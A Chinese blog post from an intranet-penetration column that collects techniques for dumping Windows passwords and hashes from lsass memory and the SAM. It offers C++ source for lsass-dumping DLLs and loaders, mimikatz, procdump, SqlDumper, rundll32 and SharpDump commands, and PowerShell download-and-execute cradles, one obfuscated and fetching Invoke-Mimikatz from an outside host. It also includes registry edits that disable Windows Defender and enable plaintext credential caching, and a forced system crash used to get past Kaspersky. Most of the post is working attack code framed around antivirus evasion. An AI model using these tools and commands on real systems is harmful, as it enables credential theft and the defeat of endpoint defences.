导出windows密码技巧总结

最新推荐文章于 2024-05-25 11:15:12 发布
最新推荐文章于 2024-05-25 11:15:12 发布
阅读量6.2k 收藏 9
点赞数 1
分类专栏: 内网渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64910183/article/details/121970858
版权

一、使用RPC控制lsass加载SSP,实现DUMP LSASS绕过杀软

1.已编译好的ssp.dll(建议自己编译)

spp.dll 需要修改为完整的绝对路径,测试环境是win2012 管理员权限,提取的文件在C:\Windows\Temp\temp.bin,在windows 10 可能需要system权限。

编译成功的spp.dll文件以及loader注入器:

https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/tools/loader.zip

loader.exe  ssp.dll

mimikatz # sekurlsa::minidump teamp.bin 

mimikatz # sekurlsa::logonPasswords full

2.编译以及注意点

(1).所编译的.h 文件是 x64,不能用x86进行编译;生成.h文件直接写一个idl文件就可以生成,至于为什么要用x64的编译是因为xpn师傅当时只分析了x64的ssp注册流程,写的也是x64的流程,而且x86的注册api也是不一样的, x86并没有NdrClientCall3这个函数,win10用的是NdrClientCall4封装的NdrClientCall2,win7直接用的NdrClientCall2,要兼容x86你需要按照xpn师傅的文章重新分析然后重写注册流程。

(2).使用vs 2015,静态库中使用MFC进行编译

(3).注意编译的路径和文件名以及lass.exe的进程ID值

(4).编译 的ssp.dll代码:

https://gist.github.com/xpn/93f2b75bf086baf2c388b2ddd50fb5d0

// dllmain.cpp : 定义 DLL 应用程序的入口点。

#include "pch.h"

#include <stdio.h>

#include <windows.h>

#include <DbgHelp.h>

#include <TlHelp32.h>

#pragma comment(lib,"Dbghelp.lib")

typedef HRESULT(WINAPI* _RtlAdjustPrivilege)(

    ULONG Privilege, BOOL Enable, BOOL CurrentThread, PULONG Enabled);

typedef HRESULT(WINAPI* _MiniDumpW)(

    DWORD arg1, DWORD arg2, PWCHAR cmdline);

int GetPid()

{

    PROCESSENTRY32 pe32;

    pe32.dwSize = sizeof(pe32);

    HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    if (hProcessSnap == INVALID_HANDLE_VALUE) {

        printf("CreateToolhelp32Snapshot Error!");

        return false;

    }

    BOOL bResult = Process32First(hProcessSnap, &pe32);

    while (bResult)

    {

        if (_stricmp(pe32.szExeFile, "lsass.exe") == 0)

        {

            return pe32.th32ProcessID;

        }

        bResult = Process32Next(hProcessSnap, &pe32);

    }

    CloseHandle(hProcessSnap);

    return -1;

}

int Dump_Lsass() {

    HRESULT hr;

    _MiniDumpW MiniDumpW;

    _RtlAdjustPrivilege RtlAdjustPrivilege;

    ULONG t;

    MiniDumpW = (_MiniDumpW)GetProcAddress(

        LoadLibrary("comsvcs.dll"), "MiniDumpW");

    RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(

        GetModuleHandle("ntdll"), "RtlAdjustPrivilege");

    if (MiniDumpW == NULL || RtlAdjustPrivilege == NULL)

    {

        return 0;

    }

    RtlAdjustPrivilege(20, TRUE, FALSE, &t);

    wchar_t ws[100];

    int pid = GetPid();

    if (pid != -1)

    {

        swprintf(ws, 100, L"%d %hs", pid, "c:\\users\\public\\1.Dmp full"); #需要注意这里输出的路径和文件名,,以及pid进程值

    }

    else {

        return 0;

    }

    

    MiniDumpW(0, 0, ws);

    return 0;

}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {

    switch (ul_reason_for_call) {

    case DLL_PROCESS_ATTACH:

        Dump_Lsass();

        break;

    case DLL_THREAD_ATTACH:

    case DLL_THREAD_DETACH:

    case DLL_PROCESS_DETACH:

        break;

    }

    return TRUE;

}

或者

#include <cstdio>

#include <windows.h>

#include <DbgHelp.h>

#include <iostream>

#include <TlHelp32.h>

#pragma comment(lib,"Dbghelp.lib")

typedef HRESULT(WINAPI* _MiniDumpW)(

    DWORD arg1, DWORD arg2, PWCHAR cmdline);

typedef NTSTATUS(WINAPI* _RtlAdjustPrivilege)(

    ULONG Privilege, BOOL Enable,

    BOOL CurrentThread, PULONG Enabled);

int dump() {

    HRESULT hr;

    _MiniDumpW MiniDumpW;

    _RtlAdjustPrivilege RtlAdjustPrivilege;

    ULONG t;

    MiniDumpW = (_MiniDumpW)GetProcAddress(

        LoadLibrary(L"comsvcs.dll"), "MiniDumpW");

    RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(

        GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege");

    if (MiniDumpW == NULL) {

        return 0;

    }

    // try enable debug privilege

    RtlAdjustPrivilege(20, TRUE, FALSE, &t);

    wchar_t ws[100];

    swprintf(ws, 100, L"%hs", "784 c:\\1.bin full"); //784是lsass进程的pid号 "<pid> <dump.bin> full" 

    MiniDumpW(0, 0, ws);

 return 0;

}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {

 switch (ul_reason_for_call) {

 case DLL_PROCESS_ATTACH:

  dump();

  break;

 case DLL_THREAD_ATTACH:

 case DLL_THREAD_DETACH:

 case DLL_PROCESS_DETACH:

  break;

 }

 return TRUE;

}

写了DUMP LSASS的DLL:

inject_lass_dump.exe dump_dll.dll

Project6.exe

3.参考链接

XPN的分析:Exploring Mimikatz - Part 2 - SSP - XPN InfoSec Blog
三好学生的分析:的分析3gstudent-Blog

奇安信编译让杀软:

这是一篇“不一样”的真实渗透测试案例分析文章 - 奇安信A-TEAM技术博客

4.总结

该方法需要自己编译,需要知道目标系统的lass.exe进程的ID值,以及设置输出的路径,编译有点麻烦,可以绕过大多数杀软,如绕过卡巴斯基

二、使用Masterkey工具获取密码(windows10和win7下测试成功)

1. 查看目标远程凭据(如果有文件就相当于有凭据):

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
#如果此文件下没有发现评级,可使用cmdkey /list 命令后一般出现了凭据信息,如果还是没出现文件,说明文件是隐藏的,可以把隐藏系统文件勾选取消了或者使用命令dir /a进行查看。
#dir /a C:\Users\每个用户\AppData\Local\Microsoft\Credentials\    //会把所有登录的用户的凭据加密文件都找出来

2. 将此文件夹中的文件从目标机远程下载到本地的C:\a文件夹中

3. 在目标机上使用procdump获取目标lsass.exe内存

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

4. 将lsass.dmp复制到本地,选择一个刚刚下载下来的密码文件对其进行解密。此处需要记录下guidMasterKey的值。

mimikatz # dpapi::cred /in:C:\a\DACFAEA5B624B4361794A2CC8AED1460


5. 本地使用命令加载dmp并获取guidMasterKey:

mimikatz# sekurlsa::minidump lsass.dmp //将lsaa.dmp导入
mimikatz# sekurlsa::dpapi

6.复制此Masterkey,并执行命令解密:

mimikatz # dpapi::cred /in:C:\a\DACFAEA5B624B4361794A2CC8AED1460 /masterkey:6e65bc98836fcd5cd41c2d28ec96e538804c8b4d0419569b54a1be526f998192b1791ee40d995e6b4a9b3f126

7.解密成功,获取到目标远程连接的账号与密码:

8.总结:

(1).方法只需要管理员权限,而非system权限,可导出guidMasterKe文件

(2).需要结合微软自带的工具procdump导出lasss.exe

(3).然后将其guidMasterKe文件和lass.exe文件下载到本地通过mimiktaz进行读取解密,是绕过杀软获取明文的方法。

三、procdump获取密码

1.powershell版的procdump

下载地址:https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-ProcessMiniDump.ps1

(1).获得lsass.exe的进程ID
tasklist /svc |findstr lsass.exe

1.png


(2).本地dump lsass.exe进程的内存文件

powershell -exec bypass "import-module .\Get-ProcessMiniDump.ps1;Get-ProcessMiniDump -ProcID 660 -Path C:\windows\tasks\lsass.dmp"

(3)远程 dump lsass.exe进程的内存文件

powershell.exe IEX (New-Object Net.WebClient).DownloadString('

https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-ProcessMiniDump.ps1

');Get-ProcessMiniDump -ProcID 660 -Path C:\windows\tasks\lsass.dmp"

2.png

3.png


(4).mimikatz获取本地密码
mimikatz# sekurlsa::minidump lsass.dmp
mimikatz#  sekurlsa::logonPasswords full
 

4.png

2.微软自带的工具ProcDump

ProcDump - Windows Sysinternals | Microsoft Docs

(1).Procdump.exe -accepteula -ma lsass.exe lsass.dmp

(2).把lsass.dmp下载到本地,放在同样的系统(目标是windows2008-->本地也用Windows2008)
(3).mimikatz加载lsass.dmp
sekurlsa::minidump lsass.dmp
(4).抓取密码
sekurlsa::logonPasswords full

3.一建命令

dump_passwd.bat

@echo off

color 0a

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit" > p6sw4d.txt

4.总结

(1).Get-ProcessMiniDump.ps1和procdump相比,优点在于Get-ProcessMiniDump.ps1可以使用IEX方式远程下载执行,从而达到不落地的目的;

(2).当然procdump为微软自己的工具免杀应该会好一些,在有卡巴斯基的机器上执行powershell是会被拦截的。

四、SqlDumper.exe 获取密码

1.如果目标系统上安装了windows sql server ,SqlDumper.exe默认存放在c:\Program Files\Microsoft SQL Server\number\Shared,其中number代表sql server的版本
140 for SQL Server 2017
130 for SQL Server 2016
120 for SQL Server 2014
110 for SQL Server 2012
100 for SQL Server 2008
90 for SQL Server 2005
我本地安装的是Windows sql server 2016 所以我的SqlDumper.exe在这个位置C:\Program Files\Microsoft SQL Server\130\Shared\ 

2.png

 - 
2.如果目标没有安装Windows sql server ,可以自己上传一个SqlDumper.exe和procdump.exe一样,都是微软自己的,不会存在被AV杀掉的可能,除非安装的杀毒软件有dump内存文件保护: 
3.SqlDumper.exe的大小远小于procdump.exe、procdump64.exe

sp180913_224043.png

 
4.使用方法: 
(1).查看lsass.exe 的ProcessID
tasklist /svc |findstr lsass.exe

sp180913_231318.png


(2).根据ProcessID来dump 内存文件,Full dump file执行成功后会生产SQLDmpr0001.mdmp文件

Sqldumper.exe ProcessID 0 0x01100
 

4.png

5.mimikatz加载dump文件
sekurlsa::minidump SQLDmpr0001.mdmp
sekurlsa::logonPasswords full
 

sp180913_231500.png

6.批处理命令执行

for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do Sqldumper.exe %i 0 0x01100

sqldumper.exe  1036  0   0x01100

7.总结:

(1).sql2012版依赖msvcr100.dll,sql2016版依赖msvcr120.dll

(2).SqlDumper.exe体积大小于procdump.exe、procdump64.exe,命令行操作,微软自己东西,免杀。

(3).针对内存保护的杀软是无法导出的,如卡巴斯基,NOD32

五、mimikatz工具获取密码

1.自身命令获取密码

https://github.com/gentilkiwi/mimikatz/releases

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"  "exit"  #在命令窗口中显示

mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit" > p6sw4d.txt  #导出到一个记事本文件中显示

2.powershell版本的mimikatz

https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1

(1).本地执行

C:\Users\test\Desktop>powershell -exec bypass "import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz"

(2).远程加载

powershell.exe IEX (New-Object Net.WebClient).DownloadString('

https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1

');Invoke-Mimikatz

或者

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
 

(3).Invoke-Mimikatz简单混淆就bypass

powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.0'+'.101/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"

3.windwos10以及以上抓取明文:

(1).临时禁止Windows Defender
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
gpupdate /force  #键值为1时Wdigest Auth保存明文口令,为0则不保存明文

(2).修改注册表开启UseLogonCredential
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
(3).等用户下次再登录的时候,可抓到明文密码
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit

4.powershell 免杀抓明文 :

powershell "IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1'); Get-Process lsass | Out-Minidump -DumpFilePath c:\windows\temp"

只需把 dmp 文件拖到本机机器再用 mimikatz.exe 加载 lsass_504.dmp 文件读取即可
# mimikatz.exe "sekurlsa::minidump lsass_504.dmp" "sekurlsa::logonPasswords full" exit

5.总结

(1).可以直接抓取win7以下的系统明文密码,不免杀,需要自己修改,对代码进行修改,重新编译免杀mimikatz

(2).win 8,8.1,2012,10,16修改改注册表下次系统登录可抓取明文密码

六、QuarksPwDump导出密码

https://github.com/quarkslab/quarkspwdump

QuarksPwDump.exe  -dhl

总结:该工具不免杀,容易被杀

七、wce导出密码

Amplia Security - Research - WCE FAQ

wce.exe -w

总结:该工具只能用于windows2003.winxp系统中

八、pwdump7导出密码

http://www.tarasco.org/security/pwdump_7/index.html

PwDump7.exe

总结:该工具不免杀

九、LaZagne导出密码

https://github.com/AlessandroZ/LaZagne

laZagne_x86.exe windows

总结:该工具不免杀

十、任务管理器内存dump

1.通过以下操作可先获取到lsass内存文件,然后使用mimikatz可进一步读取密码

2.可发现成功的创建了一个dmp文件,把它拷贝到本地,然后使用mimikatz恢复获取明文

mimikatz.exe "sekurlsa::minidump c:\lsass.dmp""sekurlsa::logonPasswords full" "exit" >pass64.txt

十一 .c#版本的mimikatz工具SharpDump

https://github.com/GhostPack/SharpDump

for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do SharpDump.exe %i

sharpdump.exe   lass.exe进程ID

体积小[也就 9k 左右],免杀[实测 nod32 没啥问题]暂时还可以,默认它会自动 dump lsass.exe 进程数据,当然,你也可以指定进程 id 来 dump,在一些断网环境下很实用,如
下,先在目标机器上把 lsass.exe 进程数据导出来 

之后,依然是回到本机机器用 mimikatz.exe 读取刚刚 dump 出的文件,特别注意,dump 的文件默认是 bin 后缀,拖到本地机器以后,需要自行把 bin 重命名为 zip 的后缀,然后正常解压处里面的文件,再丢给 mimikatz 去读取即可,如下
# mimikatz.exe "sekurlsa::minidump debug504" "sekurlsa::logonPasswords full" "exit" 

十二、rundll32获取密码

1.批处理命令执行

MiniDumpWriteDump via COM+ Services DLL | modexp

for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump %i .\lsass.dmp full

rundll32.exe C:\windows\System32\comsvcs.dll,MiniDump 856 .\lass.dmp full

2.powershell版本执行

powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump 460 C:\lsass.dmp full" (460是lsass.exe的进程,因系统不同,所以部分机器的pid值不同,利用comsvcs.dll 文件中的MiniDump 函数来Dump)

mimikatz.exe "sekurlsa::minidump c:\lsass.dmp" "sekurlsa::logonpasswords full" "exit" > fb.txt

十三、SAM数据库导出获取密码

1.管理员执行:

reg save hklm\sam .\sam.hive&reg save hklm\system .\system.hive

2.将两个文件拷贝到本地,然后导入SAMInside并将NT-Hash复制出来去相关网站查询即可(mimikatz也可以读)

十四、通过Windows蓝屏文件来绕过kaspersky的内存保护抓密码

卡巴以及小红伞均对lsass.exe进行了保护,导致微软出的两款工具以及他自己的kldumper都无法用于dump lsass。但是可以通过制造蓝屏来获取所有内存的文件MEMORY.DMP没然后在提出lsass进一步读取。

需要的工具:WinDBG+mimilib.dll

测试环境一:win8.1
kaspersky2019(病毒库为2018.10.25号的)


1.首先我用procdump来dump lsass.exe的内存文件


2.再用我在https://www.t00ls.net/thread-47663-1-1.html中分享的用sqldump来dump,结局都一样,因为sqldump和procdump的原理都一样


3.下面我们就用Windows蓝屏memory.dmp文件来测试
获取蓝屏后的dmp文件,使系统蓝屏的方法有很多,比如说强制结束系统进程,我这里选择强制结束系统进程wininit.exe
管理员权限运行cmd后,执行taskkill /f /im "wininit.exe"


4.取回存在于C:\Windows\文件夹下面的MEMORY.DMP文件


5.运行windbg,使用Open the crashdump加载MEMORY.DMP


6.加载mimikatz的mimilib.dll
.load C:\Users\Administrator\Desktop\qqq\mimilib.dll注意load 前面那个点别漏掉


7.设置微软符号服务器(这一步在测试中可有可无)
.SymFix
8.重新加载
.Reload
9.查看lsass.exe进程的内存地址
!process 0 0 lsass.exe
10.切换到lsass.exe进程中
.process /r /p fffffa800e069b00


11.运行mimikatz
!mimikatz
 

12.总结:

缺点:
(1).使用这种方法抓密码,需要机器重启一次,蓝屏一次,而且第一次重启之后你想要的user得重新登陆后才行
(2).memory.dmp文件会很大
优点:
(1).绕过kaspersky对内存的保护

十五、利用windows api dump进程

使用PssCaptureSnapshot的好处是,当获取明文时调用MiniDumpWriteDump时,它不会直接读取lsass进程内存,而是从进程的快照中读取。在MiniDumpWriteDump调用中使用由PssCaptureSnapshot返回的句柄,而不是LSASS进程句柄

代码如下:

#include "stdafx.h"

#include <windows.h>

#include <DbgHelp.h>

#include <iostream>

#include <TlHelp32.h>

#include <processsnapshot.h>

#pragma comment (lib, "Dbghelp.lib")

using namespace std;

BOOL CALLBACK MyMiniDumpWriteDumpCallback(

__in PVOID CallbackParam,

__in const PMINIDUMP_CALLBACK_INPUT CallbackInput,

__inout PMINIDUMP_CALLBACK_OUTPUT CallbackOutput

)

{

switch (CallbackInput->CallbackType)

{

case 16: // IsProcessSnapshotCallback

CallbackOutput->Status = S_FALSE;

break;

}

return TRUE;

}

int main() {

DWORD lsassPID = 0;

HANDLE lsassHandle = NULL;

HANDLE outFile = CreateFile(L"c:\\temp\\lsass.dmp", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

PROCESSENTRY32 processEntry = {};

processEntry.dwSize = sizeof(PROCESSENTRY32);

LPCWSTR processName = L"";

if (Process32First(snapshot, &processEntry)) {

while (_wcsicmp(processName, L"lsass.exe") != 0) {

Process32Next(snapshot, &processEntry);

processName = processEntry.szExeFile;

lsassPID = processEntry.th32ProcessID;

}

wcout << "[+] Got lsass.exe PID: " << lsassPID << endl;

}

lsassHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, lsassPID);

HANDLE snapshotHandle = NULL;

DWORD flags = (DWORD)PSS_CAPTURE_VA_CLONE | PSS_CAPTURE_HANDLES | PSS_CAPTURE_HANDLE_NAME_INFORMATION | PSS_CAPTURE_HANDLE_BASIC_INFORMATION | PSS_CAPTURE_HANDLE_TYPE_SPECIFIC_INFORMATION | PSS_CAPTURE_HANDLE_TRACE | PSS_CAPTURE_THREADS | PSS_CAPTURE_THREAD_CONTEXT | PSS_CAPTURE_THREAD_CONTEXT_EXTENDED | PSS_CREATE_BREAKAWAY | PSS_CREATE_BREAKAWAY_OPTIONAL | PSS_CREATE_USE_VM_ALLOCATIONS | PSS_CREATE_RELEASE_SECTION;

MINIDUMP_CALLBACK_INFORMATION CallbackInfo;

ZeroMemory(&CallbackInfo, sizeof(MINIDUMP_CALLBACK_INFORMATION));

CallbackInfo.CallbackRoutine = &MyMiniDumpWriteDumpCallback;

CallbackInfo.CallbackParam = NULL;

PssCaptureSnapshot(lsassHandle, (PSS_CAPTURE_FLAGS)flags, CONTEXT_ALL, (HPSS*)&snapshotHandle);

BOOL isDumped = MiniDumpWriteDump(snapshotHandle, lsassPID, outFile, MiniDumpWithFullMemory, NULL, NULL, &CallbackInfo);

if (isDumped) {

cout << "[+] lsass dumped successfully!" << endl;

}

PssFreeSnapshot(GetCurrentProcess(), (HPSS)snapshotHandle);

return 0;

}

十六、获取本地密码工具

https://github.com/TheKingOfDuck/hashdump

https://github.com/outflanknl/Dumpert

渗透测试中心
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Windows 8.1新增的进程快照API简单探究
a1875566250的专栏
02-09 2994
在Win8.1中,相比Win8新增了一组名为"进程快照"的API,是文档化的东西,它可以帮助我们在一个时间获取进程的某些信息,比如线程,句柄,CPU周期性能等数据,以便进行APP的性能分析和存储到文件等调试类帮助。 具体请看下面代码:
绕过卡巴斯基通过RPC控制lsass注入DLL
2ed
04-16 2839
参考国外的XPN以及3gstudent大佬的文章: https://blog.csdn.net/xiangshen1990/article/details/104872566 https://gist.github.com/xpn/93f2b75bf086baf2c388b2ddd50fb5d0 原理:正常的ssp扩展(dll)可以加载到lsass进程中去,比如kerberos验证都是通...
Windows系统丢失spp.dll文件导致程序异常问题
file
10-15 480
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个spp.dll文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现spp.dll丢失要怎么解决?
mimikatz抓取windows明文密码和cs与msf权限传递
最新发布
m0_65540912的博客
05-25 503
在默认情况下,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,如下图,密码字段显示为null,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。set payload windows/meterpreter/reverse_http(这个payload要跟设置的payload保持一致)这里注销就需要进行强制锁屏,因为是远程,锁屏需要借助脚本来进行,我这里就直接用电脑锁屏演示一下能否抓取明文。修改注册表之后,需注销用户,重新登录才能生效,才能抓取到明文。
读取 Windows Hash 密码两种方式
weixin_46079186的博客
12-10 959
管理员执行cmd reg save HKLM\SYSTEM C:\sys.hiv reg save HKLM\SAM C:\sam.hiv 导出注册表文件 下载mimikatz https://github.com/gentilkiwi/mimikatz/releases 配置环境变量 我们在c盘目录下,命令行直接执行 mimikatz.exe lsadump::sam /sam:sam.hiv /system:sys.hiv ...
spp.dll文件丢失导致程序无法运行问题
2301_76755223的博客
02-20 973
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个spp.dll文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现spp.dll丢失要怎么解决?
Windows2003用户导入和导出工具
07-22
综上所述,Windows Server 2003的用户导入和导出工具是一套完整的解决方案,涵盖了用户账户的备份、迁移和批量管理。管理员通过这些工具可以高效地维护用户数据库,确保在各种场景下用户账户的稳定性和安全性。了解...
解密navicat保存的MYSQL密码
03-25
这个过程涉及到密码解密和还原的技巧。 首先,Navicat在连接MySQL数据库时,会将用户的用户名、密码等信息存储在本地计算机的注册表中。这些信息是经过加密的,以保护用户的隐私和数据安全。因此,我们需要了解...
mysql数据库导出xml的实现方法
09-11
MySQL本身并没有直接提供导出XML的功能,但可以通过命令行结合一些技巧实现这一目的。 ##### 2.1 基础命令格式 通过`mysql`命令行工具,我们可以执行SQL语句并获取结果。下面是一个简单的例子: ```shell mysql -u...
windows和unix下通过spool导出oracle数据(导成insert语句)
11-24
本文将详细讲解如何在Windows和Unix环境下利用SQL*Plus的`spool`命令来导出Oracle数据库中的数据,并将其转换为INSERT语句或纯文本格式。 `spool`是SQL*Plus的一个内置命令,它允许用户将SQL*Plus会话的输出重定向...
导出脚本工具
09-09
7. **安全性**:导出脚本工具可能需要遵循特定的安全措施,比如限制敏感信息(如密码)的导出,或者在导出前进行脱敏处理。 8. **性能优化**:在处理大型数据库时,导出工具应具备性能优化功能,如批量处理、多线程...
粒子引擎spp20
05-19
开源的粒子引擎代码,有此学习需求的可以一看
绕过卡巴斯基dump进程lsass.exe内存
xiangshen1990的博客
03-15 6991
绕过卡巴斯基dump进程lsass.exe内存1:简介2:流程2.1:编译XPN大牛的代码2.2:实现dump内存代码2.3:自动获取lsass.exe进程的pid3:效果 1:简介 起因是前两天看到QAX-Ateam的一篇关于渗透的文章《这是一篇“不一样”的真实渗透测试案例分析文章》,里面提到了学习XPN大牛的方法,绕过卡巴斯基的防护机制成功dump进程lsass.exe的内存,再将其下载到本地...
启动应用程序出现spp.dll找不到问题解决
wbcmbfy的博客
02-29 605
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个spp.dll文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现spp.dll丢失要怎么解决?
内网渗透之某后渗透利用【网络安全
kali_Ma的博客
03-23 3328
主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中,Mimikatz 通过注入lsass.exe进程读取进程内存,从中获取对应的明文密码
横向移动之windows登录账号密码导出
good good study
02-16 2845
在默认情况下,当系统为win10或2012R2及以上时,默认在内存缓存中禁止保存明文密码,所以无法在 lsass.exe 进程中抓取明文密码。此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。
绕过查杀工具实现lsass转储
stars的博客
05-01 938
最近看到mrd0x分享了一个程序通过此程序执行命令获取lsass转储文件,此文件是vs2022里的DumpMinitool.exe。此程序路径为: C:\ProgramFiles\MicrosoftVisualStudio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions 接下来测试一下效果,先看一下程序信息 查看数字签名发现是微软,到这已经可以预见测试效果了,接下来开始正式测试。 使用火绒对程序扫描: 使用程
MiniDump文件的生成(三)
kecise的专栏
08-17 3935
本文将详细的介绍MiniDumpCallback函数使用。使用该函数可以让MiniDumpWriteDump 1) 忽略某一可执行模块的信息(全部或部分); 2)忽略某一线程的信息(全部或部分); 3)将用户指定的内存空间的内容写入生成的DMP文件中。 1. MiniDumpCallback的声明如下: CallbackParam是用户为MiniDumpCallback自定义的参数。
Mimikatz免杀实战:绕过360核晶和defender
xf555er的博客
08-22 2842
通常来说,即使我们成功实现了mimikatz的静态免杀,其抓取hash的行为仍可能会被防病毒软件检测到虽然你可以通过修改mimikatz的源码来实现行为上的免杀,但这需要花费大量的时间。我建议针对具体功能的代码来实现免杀,例如,mimikatz的dump hash功能主要依赖于Windows API的Minidump函数。
导出windows 文件夹目录
06-03
导出 Windows 文件夹目录,您可以按照以下步骤操作: 1. 打开 Windows 资源管理器并定位到要导出的文件夹。 2. 在文件夹上右键单击,选择“属性”。 3. 在“属性”对话框中,选择“安全”选项卡。 4. 单击“高级”按钮,在“高级安全设置”对话框中选择“导出”。 5. 在“导出文件夹安全设置”对话框中,选择保存导出文件的位置和文件名,然后单击“保存”。 6. 如果您想要导出文件夹中的文件列表,可以使用命令提示符或PowerShell执行以下命令: ``` dir /s > 文件夹列表.txt ``` 这将在文件夹中创建一个名为“文件夹列表.txt”的文本文件,其中包含文件夹中的所有文件和子文件夹的列表。 注意,您需要具有足够的权限才能导出文件夹的安全设置和文件列表。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透测试中心

各位师傅,觉得文章不错可支持下

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值